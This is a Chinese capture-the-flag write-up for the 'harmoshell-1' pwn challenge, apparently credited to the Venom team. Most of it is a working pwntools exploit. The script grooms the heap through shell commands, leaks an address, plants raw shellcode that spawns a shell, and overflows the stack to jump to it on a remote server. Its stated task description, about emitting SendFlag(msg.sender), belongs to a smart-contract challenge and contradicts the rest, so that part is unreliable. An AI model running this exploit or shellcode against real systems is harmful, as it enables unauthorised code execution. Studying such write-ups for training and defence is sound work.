harmoshell-1

点击此处获得更好的阅读体验


WriteUp来源

来自Venom战队发布

题目描述

Your goal is to emit SendFlag(msg.sender)

题目考点

  • 未初始化导致stack overflow

解题思路

当echo一个不存在的文件时会向栈里写数据,输入过长导致栈溢出,先leak堆地址,然后跳到堆执行shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *
context.log_level = 'debug'
p = remote("121.37.222.236", 9999)
def add(name):
p.sendlineafter("$ ", "touch "+name)
def free(name):
p.sendlineafter("$ ", "rm "+name)
def show(name):
p.sendlineafter("$ ", "cat "+name)
def edit(name, content):
p.sendlineafter("$ ", "echo > "+name)
p.send(content)
add("aaa")
add("bbb")
add("ccc")
add("ddd")
free("aaa")
free("ccc")
add("a")
show("a")
add("b")
shellcode = "\x01\x11\x06\xec\x22\xe8\x13\x04\x21\x02\xb7\x67\x69\x6e\x93\x87\xf7\x22\x23\x30\xf4\xfe\xb7\x77\x68\x10\x33\x48\x08\x01\x05\x08\x72\x08\xb3\x87\x07\x41\x93\x87\xf7\x32\x23\x32\xf4\xfe\x93\x07\x04\xfe\x01\x46\x81\x45\x3e\x85\x93\x08\xd0\x0d\x73\x00\x00\x00"
edit("b", shellcode)
p.sendlineafter("$ ", "echo > e")
p.send("a"*312+p32(0x25f10))
p.interactive()